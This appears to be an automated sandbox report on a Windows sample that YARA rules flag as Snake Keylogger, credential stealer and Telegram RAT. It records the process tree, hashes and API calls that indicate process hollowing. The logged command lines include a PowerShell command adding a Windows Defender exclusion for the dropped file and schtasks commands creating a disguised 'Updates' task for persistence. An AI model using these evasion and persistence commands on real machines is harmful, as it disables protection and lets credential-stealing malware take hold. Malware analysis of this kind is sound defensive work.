Path:	C:\Users\user\Desktop\EUYIlr7uUX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EUYIlr7uUX.exe"
Imagebase:	0x8a0000
File size:	765'440 bytes
MD5 hash:	A3939099773CDA5B2C94A6F1061FFA19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:41:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"
Imagebase:	0x420000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:41:05
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:41:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp"
Imagebase:	0xce0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:41:05
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:41:05
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\EUYIlr7uUX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EUYIlr7uUX.exe"
Imagebase:	0x530000
File size:	765'440 bytes
MD5 hash:	A3939099773CDA5B2C94A6F1061FFA19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	16:41:06
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
Imagebase:	0x6c0000
File size:	765'440 bytes
MD5 hash:	A3939099773CDA5B2C94A6F1061FFA19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:41:07
Start date:	07/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:41:08
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp"
Imagebase:	0xce0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:41:08
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:41:08
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"
Imagebase:	0x7a0000
File size:	765'440 bytes
MD5 hash:	A3939099773CDA5B2C94A6F1061FFA19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	187
Total number of Limit Nodes:	14

Executed Functions

Function 08DA2EC0 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1445018637.0000000008DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8da0000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7173073913976f376937db5b4a4612ddc2409c4b7772076736767a433bd89937
Instruction ID: 8dbdfc70e7af35cf66af3d4349e36676570e7a42dabee3d19160f2aa0de1888d
Opcode Fuzzy Hash: 7173073913976f376937db5b4a4612ddc2409c4b7772076736767a433bd89937
Instruction Fuzzy Hash: 1DF17E70A002199FDB19DFA9D854BAEBBB6BFC8340F208168E446EB390DF34D941CB50

Function 08DA34A8 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1445018637.0000000008DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8da0000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9250d0efcdf22e572490b504668cdd7681a1ceabcfd6304fd11bb336a4d4ac6e
Instruction ID: ad45acd2f1a6925cc3d4a0b589a5e6e2978e6b1a18ec5179355c1d2c4786c2af
Opcode Fuzzy Hash: 9250d0efcdf22e572490b504668cdd7681a1ceabcfd6304fd11bb336a4d4ac6e
Instruction Fuzzy Hash: 0FF13E30A00209DFCB18CFA9D944AADBBB7FF88396F258269E455AB360D731DD41CB51

Function 06F36954 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F36B96

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 06117a12099ecb73841a6b9d369e01eeabb3d6e1461977ab527b9cc59d0ae442
Instruction ID: e8874a15e64b3b83cbc7d369d8a35c5c76b75b407807128051c5cb01cb9aa36b
Opcode Fuzzy Hash: 06117a12099ecb73841a6b9d369e01eeabb3d6e1461977ab527b9cc59d0ae442
Instruction Fuzzy Hash: 44A13771D00629DFEF60DFA9C8417EEBBB2FB48314F1485A9E808A7240DB759985CF91

Function 06F36960 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F36B96

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 33011fd29d3bb7208ae874d8e0bb7e9386c3c7324994c5a6f9201841ea3e9220
Instruction ID: 75e93bb7acecdf9dc5c95c752b6fa44ed65ad2ebb1de46f34858a14fb6ded1fb
Opcode Fuzzy Hash: 33011fd29d3bb7208ae874d8e0bb7e9386c3c7324994c5a6f9201841ea3e9220
Instruction Fuzzy Hash: 43913771D00229DFEF60DF69C840BEEBBB2FB48314F148569E808A7240DB759985CF91

Function 02C744E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C759C9

Memory Dump Source

Source File: 00000000.00000002.1440154599.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_EUYIlr7uUX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 788b8b8f6c1612b9917ed293602c6722f0faef97db77298ae8289f1f4085b5a1
Instruction ID: 504becaffc7294090d35c0a7e7bd7e329e341513303f6a442929027d85b95366
Opcode Fuzzy Hash: 788b8b8f6c1612b9917ed293602c6722f0faef97db77298ae8289f1f4085b5a1
Instruction Fuzzy Hash: F041D470C0071DCBEB24CFA9C88479EBBF5BF49314F60806AD818AB255DB75594ACF90

Function 02C75913 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C759C9

Memory Dump Source

Source File: 00000000.00000002.1440154599.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_EUYIlr7uUX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 224c2a16645d883715c0774c32454df6696f110816bffd1e8872cf960973d4c3
Instruction ID: 8187d8cbdbc2f89b58cc92ac28051b60b3f4d74f0c8a5905f514592b97f2abee
Opcode Fuzzy Hash: 224c2a16645d883715c0774c32454df6696f110816bffd1e8872cf960973d4c3
Instruction Fuzzy Hash: 8E41D270C00719CFEB24CFA9C88479EBBB5BF89314F64806AD418AB255DB75594ACF50

Function 06F366D0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F36768

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0dc84c92d2d76f0058e1157ae8f4c231c3df47d6071dcdcf7ae0ad5259179a2e
Instruction ID: ac9f5b855201f59fc9c91e8002d3099a2f52d6d80b426869f6329eb9233b3476
Opcode Fuzzy Hash: 0dc84c92d2d76f0058e1157ae8f4c231c3df47d6071dcdcf7ae0ad5259179a2e
Instruction Fuzzy Hash: CB213571900319DFDB10CFAAC881BEEBBF5FF48310F50842AE918A7241C7799944CBA4

Function 05207024 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0520879D,?,?), ref: 0520884F

Memory Dump Source

Source File: 00000000.00000002.1443314584.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_EUYIlr7uUX.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 95d3e8121e1a784257d8baef72259ba84fe140b3381d622f850d3bd27bd35f3c
Instruction ID: c9d862ef6fff317c62485667e0d85d7c446c7e9a9d59e3601446238076f95a97
Opcode Fuzzy Hash: 95d3e8121e1a784257d8baef72259ba84fe140b3381d622f850d3bd27bd35f3c
Instruction Fuzzy Hash: 3931E0B5D013099FDB10CF9AD884AAEBBF5FF48210F14842AE919A7351D374A944CFA5

Function 052087B0 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0520879D,?,?), ref: 0520884F

Memory Dump Source

Source File: 00000000.00000002.1443314584.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5200000_EUYIlr7uUX.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 79c3437f60898bd717e9f21891c832bda7af4a46ed7f83461fd891d476caa782
Instruction ID: 7c58331b7a63a960c19cb5e1cf84e97dcabdb3cc4e1435d018f9ad7e70fd9beb
Opcode Fuzzy Hash: 79c3437f60898bd717e9f21891c832bda7af4a46ed7f83461fd891d476caa782
Instruction Fuzzy Hash: DC3100B5D013099FDB10CFAAD884ADEBBF5BF48310F14842AE819A7351C374A900CFA1

Function 06F366D8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F36768

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c96189e1dec9e4a4ba65b070a9c5e4dd058dc0e732b227fb76b636d5cdfae7f0
Instruction ID: e0c69a909eaaff34adfb056cf2ca30af2ecc3783316aba9d4ee060d6fdf75fc1
Opcode Fuzzy Hash: c96189e1dec9e4a4ba65b070a9c5e4dd058dc0e732b227fb76b636d5cdfae7f0
Instruction Fuzzy Hash: F3212475D003599FDB10CFAAC981BEEBBF5FF48310F54842AE918A7240C7789955CBA4

Function 06F36538 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F365BE

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 82b24a37e5a04b2bea65c6181de5a5f3301a62dd683bf76bd550df8765118fca
Instruction ID: c11fd628c12e258e63c1ced4e9bc02fd0651562bf461b664b0b8fb4893d86098
Opcode Fuzzy Hash: 82b24a37e5a04b2bea65c6181de5a5f3301a62dd683bf76bd550df8765118fca
Instruction Fuzzy Hash: 34213772D00319DFDB50CFAAC485BEEBBF4EF48210F14842AD419A7241CB78AA45CFA5

Function 02C7B730 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C7D5E6,?,?,?,?,?), ref: 02C7D6A7

Memory Dump Source

Source File: 00000000.00000002.1440154599.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_EUYIlr7uUX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 283157d8b87de2b4f6ea7c1f35c9418b7aacb61065f1e6d974e753f7826c223a
Instruction ID: 8eb791f261f0bccf4a9dddc449fe0022934358df39b579f88e2aaf90cb454c7b
Opcode Fuzzy Hash: 283157d8b87de2b4f6ea7c1f35c9418b7aacb61065f1e6d974e753f7826c223a
Instruction Fuzzy Hash: 9F21D4B5900248DFDB10CF9AD984ADEBBF4EB48210F14845AE919A7310D374A954CFA5

Function 06F367C1 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F36848

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2056e6bf882f7610127bef1811d12eb98d84671961fe5b398f5925dcb6b661ff
Instruction ID: 6ca0e9aed8ab816865c68dfa7ac380d48bdb8f22c5a0feb029fb945cd4ab7a38
Opcode Fuzzy Hash: 2056e6bf882f7610127bef1811d12eb98d84671961fe5b398f5925dcb6b661ff
Instruction Fuzzy Hash: 402122718003599FDB10DFAAC880AEEBBF5FF48320F10842AE918A7240C7799901DBA4

Function 06F367C8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F36848

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 175352dbe60961edd9ff1e4d18b898912e8e83294e7d0be041da4a190e15d003
Instruction ID: 9fd4968ac248e011e8e03fb236d96e772c998e1ae206480be939be5ca78cbe00
Opcode Fuzzy Hash: 175352dbe60961edd9ff1e4d18b898912e8e83294e7d0be041da4a190e15d003
Instruction Fuzzy Hash: 0C212571C003599FDB10CFAAC881BEEBBF5FF48310F54842AE918A7240C7799901CBA5

Function 06F36540 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F365BE

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3adf2563165cc516664c8523d1d049a791d4c7a9cda1c2a4fa4666ab836d2ac6
Instruction ID: 5038b318246eaba00dfd0e9a61b2c8bbfb4d6b9324a43d141e6127a291222fdd
Opcode Fuzzy Hash: 3adf2563165cc516664c8523d1d049a791d4c7a9cda1c2a4fa4666ab836d2ac6
Instruction Fuzzy Hash: 06214772D003099FDB50CFAAC4857EEBBF4EF48210F14842AD419A7241CB78A945CFA5

Function 02C7D619 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C7D5E6,?,?,?,?,?), ref: 02C7D6A7

Memory Dump Source

Source File: 00000000.00000002.1440154599.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_EUYIlr7uUX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 32c2c1fa4cad70db78df246ba1f0de4acae26c0a64c75109da157ed92c177f73
Instruction ID: 70d9012ec77032427a01a7c1c410bb5b1e0d8d2d501a638800784df53672250e
Opcode Fuzzy Hash: 32c2c1fa4cad70db78df246ba1f0de4acae26c0a64c75109da157ed92c177f73
Instruction Fuzzy Hash: 0421E3B5900208DFDB10CFAAD984ADEBBF4BF48210F14845AE918A7311D378AA44CF65

Function 06F36610 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F36686

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 207a381725cea7d278b15ed74acc543576b75ae07612477eb3391daf8c22dac8
Instruction ID: b683e19b6039eb496cdbbc1d26050f19d6b5039b6ad855722023763fff7c0c39
Opcode Fuzzy Hash: 207a381725cea7d278b15ed74acc543576b75ae07612477eb3391daf8c22dac8
Instruction Fuzzy Hash: 29114771900349DFDB10DFAAC844BEFBBF5AF89310F248419E519A7250C776A900CFA5

Function 06F36618 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F36686

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 98a11a98d485c737590cf6c77dc6cac4be41fc705c439b1c14cf097bedf5993d
Instruction ID: 88645a2b24997ea6f99e92c68dec4be3853c13db445b4c44ff37af294dc5830c
Opcode Fuzzy Hash: 98a11a98d485c737590cf6c77dc6cac4be41fc705c439b1c14cf097bedf5993d
Instruction Fuzzy Hash: 9B112672800349DFDB10DFAAC844BDEBBF5AF49310F148419E519A7250C775A940CBA5

Function 06F36057 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F360BA

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4355f31a83b78e9bb432c530d933f31d99de348aebd093ec0f2621d0444f5911
Instruction ID: 761f082cbcd0e8efff72c052ea8ede758f7bd04c91e4fad684f9222fe75ec0c9
Opcode Fuzzy Hash: 4355f31a83b78e9bb432c530d933f31d99de348aebd093ec0f2621d0444f5911
Instruction Fuzzy Hash: 071125B1D003488FDB20DFAAD4457EEFBF4AF88220F24841AD41AA7240C779A945CFA5

Function 06F36058 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F360BA

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 93efec9883533a6ced306ce32f5700a3dc1e4b21fb89fab8f83b3f703831d311
Instruction ID: 0fbf839840297ab95845d9dd838264c94c741d7ce63b5b858fdcf1baff350325
Opcode Fuzzy Hash: 93efec9883533a6ced306ce32f5700a3dc1e4b21fb89fab8f83b3f703831d311
Instruction Fuzzy Hash: 75113AB1D00348CFDB20DFAAC4457DEFBF4AF88210F248419D519A7340C775A544CBA5

Function 06F3A700 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F3A765

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d328e2fd3d8d22e285c74bde56f99176c87bca45fc7931226744cb981ed9189f
Instruction ID: db36761279a9fe2293e1ad8bc7bd3fb01beb531fda60a4ae9e8d9f46c563435a
Opcode Fuzzy Hash: d328e2fd3d8d22e285c74bde56f99176c87bca45fc7931226744cb981ed9189f
Instruction Fuzzy Hash: 7911F2B5800349DFDB10DF9AD885BEEBBF8EB48320F208459E958A7610C375A944CFA5

Function 02C7AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C7AF9E

Memory Dump Source

Source File: 00000000.00000002.1440154599.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_EUYIlr7uUX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 25b8acaa43a060c543dd5ebe05fa1fff451d6250abd26c725876d0c4f1ede8b4
Instruction ID: 1fc81b6434b3cf88d82b249c96b9ac4fce4eb8cdc414595d2222e73ad6b1a9e6
Opcode Fuzzy Hash: 25b8acaa43a060c543dd5ebe05fa1fff451d6250abd26c725876d0c4f1ede8b4
Instruction Fuzzy Hash: 3711E0B6C007498FDB14CF9AD444BDEFBF4AF88214F14845AD819A7210C379A645CFA5

Function 06F34A28 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F3A765

Memory Dump Source

Source File: 00000000.00000002.1444107341.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_EUYIlr7uUX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ebee3dec066a94dfe54d53e3e80eaafb1d83b358c00ef6951f4beb57eec7430a
Instruction ID: 1adf4d72c2db16ce92ba9e33d12c8636def3732a990ce4fae736c9fcd0ad2001
Opcode Fuzzy Hash: ebee3dec066a94dfe54d53e3e80eaafb1d83b358c00ef6951f4beb57eec7430a
Instruction Fuzzy Hash: 2411F2B5800758DFDB10CF9AC884BEEBBF8EB48320F108459E958A7200C375A944CFA5

Function 02C7AF33 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C7AF9E

